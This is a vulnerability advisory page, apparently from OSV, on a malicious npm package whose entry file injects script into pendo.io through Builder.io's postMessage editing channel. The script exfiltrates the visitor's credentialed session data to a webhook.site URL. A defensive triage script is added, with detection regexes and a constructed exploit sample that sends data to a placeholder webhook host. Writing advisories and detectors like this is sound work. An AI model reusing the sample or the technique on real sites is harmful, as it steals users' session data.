npm

npm-builderio-qwik-poc @1.0.5

Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC

Malicious

OSV ID

MAL-2026-4623

Ecosystem

npm

Summary

The package's main entry, index.js, is a working browser exploit, not a library. When loaded in a DOM context it creates a hidden iframe pointing at www.pendo.io?builder.frameEditing=true, then sprays builder.patchUpdates postMessages whose op:'replace' payload on /bindings/show carries a JavaScript string. The Builder.io SDK's stringToFunction() hands that string to Function(), so the attacker's code runs in the pendo.io origin.

The injected script performs a credentialed fetch('https://novus-api.pendo.io/pendo/app', {credentials:'include'}), base64-encodes the response, splits it into chunks, and exfiltrates each chunk via new Image().src = 'https://webhook.site/236d0505-1750-49fe-907d-604b0934b5c7?chunk=...&d=...' to a hardcoded attacker-controlled webhook.

Any developer who bundles this package into a web application weaponizes their site against pendo.io users: because the fetch is sent with the visitor's own pendo.io cookies, any visitor who holds an authenticated pendo.io session silently leaks that session's data to the attacker. The exfil destination is hardcoded with no opt-in, configuration, or authorization gate, so the harm fires on every load regardless of consumer intent. There is no install-time or import-time Node side effect (the code needs a browser DOM), so checks that only watch lifecycle scripts or Node-side import behaviour will not trigger; the package's public API surface itself is the attack.

Source: amazon-inspector (11a743cdce28dd141d636ff13baaee44df53fbaaed17efdc5a7380281b7097e1)
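As an added triage example, not code from the advisory, from OSV, from Amazon Inspector, from Builder.io, or from the package itself: a small Node script that flags the indicator combination the summary describes (iframe creation plus a wildcard postMessage spray carrying a /bindings/ replace, and a credentialed fetch plus an image-beacon exfil to a hardcoded host), and lists every absolute URL host in a file so the reviewer can compare them against what the package claims to talk to. The two samples are constructed for this page; the example-target.test hostnames and the zeroed webhook.site path are placeholders, not the real IOCs quoted above.

```javascript
// Added triage example for this advisory page. Illustrative code, not the
// package, the Builder.io SDK, or any scanner's own logic.

// Each indicator is a regex over the package's entry-point source. In the
// advisory the exfil payload lives inside a string literal, so plain text
// matching still sees it; minified or obfuscated code would need a real parser.
const INDICATORS = [
  { id: 'iframe-created',       re: /createElement\(\s*['"`]iframe['"`]\s*\)/ },
  { id: 'frame-editing-flag',   re: /builder\.frameEditing=true/ },
  { id: 'patch-updates-msg',    re: /builder\.patchUpdates/ },
  { id: 'wildcard-postmessage', re: /postMessage\([\s\S]*?,\s*['"`]\*['"`]\s*\)/ },
  { id: 'binding-replace',      re: /op\s*:\s*['"`]replace['"`][\s\S]*?['"`]\/bindings\// },
  { id: 'credentialed-fetch',   re: /credentials\s*:\s*['"`]include['"`]/ },
  { id: 'base64-encode',        re: /\bbtoa\s*\(/ },
  { id: 'image-beacon',         re: /new\s+Image\s*\(\s*\)\s*\.src\s*=/ },
  { id: 'webhook-site-host',    re: /https?:\/\/[a-z0-9.-]*webhook\.site\//i },
];

// Returns the matched indicator ids and a verdict built from the two halves of
// the chain the summary describes: injection into a framed origin, and
// exfiltration of a credentialed response to a hardcoded sink.
function assess(source) {
  const findings = INDICATORS.filter(i => i.re.test(source)).map(i => i.id);
  const has = id => findings.includes(id);
  const injection = has('iframe-created') && (has('wildcard-postmessage') || has('patch-updates-msg'));
  const exfil = has('image-beacon') && (has('credentialed-fetch') || has('webhook-site-host'));
  const verdict = injection && exfil ? 'likely-malicious' : (injection || exfil) ? 'suspicious' : 'low';
  return { verdict, findings };
}

// Every host named in an absolute http(s) URL, deduplicated and sorted, so the
// reviewer can ask whether each one belongs in a library with this README.
function extractExternalHosts(source) {
  const hosts = new Set();
  for (const m of source.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) hosts.add(m[1].toLowerCase());
  return [...hosts].sort();
}

// Constructed sample modelled on the behaviour in the summary (placeholder
// hosts and a zeroed webhook path; this is not the package's code).
const SAMPLE_MALICIOUS = `
const f = document.createElement('iframe');
f.style.display = 'none';
f.src = 'https://www.example-target.test/?builder.frameEditing=true';
document.body.appendChild(f);
const payload = "fetch('https://api.example-target.test/app',{credentials:'include'})" +
  ".then(r=>r.text()).then(t=>{const b=btoa(t);for(let i=0;i<b.length;i+=800){" +
  "new Image().src='https://webhook.site/00000000-0000-0000-0000-000000000000?chunk='+b.slice(i,i+800)}})";
setInterval(() => f.contentWindow.postMessage(
  {type:'builder.patchUpdates', data:{updates:[{op:'replace', path:'/bindings/show', value: payload}]}}, '*'), 250);
`;

// Constructed benign sample: a credentialed fetch on its own is normal client code.
const SAMPLE_BENIGN = `
export async function loadProfile() {
  const r = await fetch('https://api.example.test/me', { credentials: 'include' });
  return r.json();
}
`;

// Usage: node scan.js node_modules/<pkg>/index.js   (no argument scans the sample)
if (typeof require === 'function' && require.main === module) {
  const fs = require('fs');
  const src = process.argv[2] ? fs.readFileSync(process.argv[2], 'utf8') : SAMPLE_MALICIOUS;
  console.log(JSON.stringify({ ...assess(src), hosts: extractExternalHosts(src) }, null, 2));
}
```

Point it at the file named in the package's "main" field, not just index.js, and treat the output as a tripwire rather than a verdict: a 'suspicious' or 'likely-malicious' result means read the source, and a 'low' result on minified code means nothing, because the regexes assume readable identifiers. The host list is often the quickest tell; a UI component library has no business naming a webhook.site URL.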
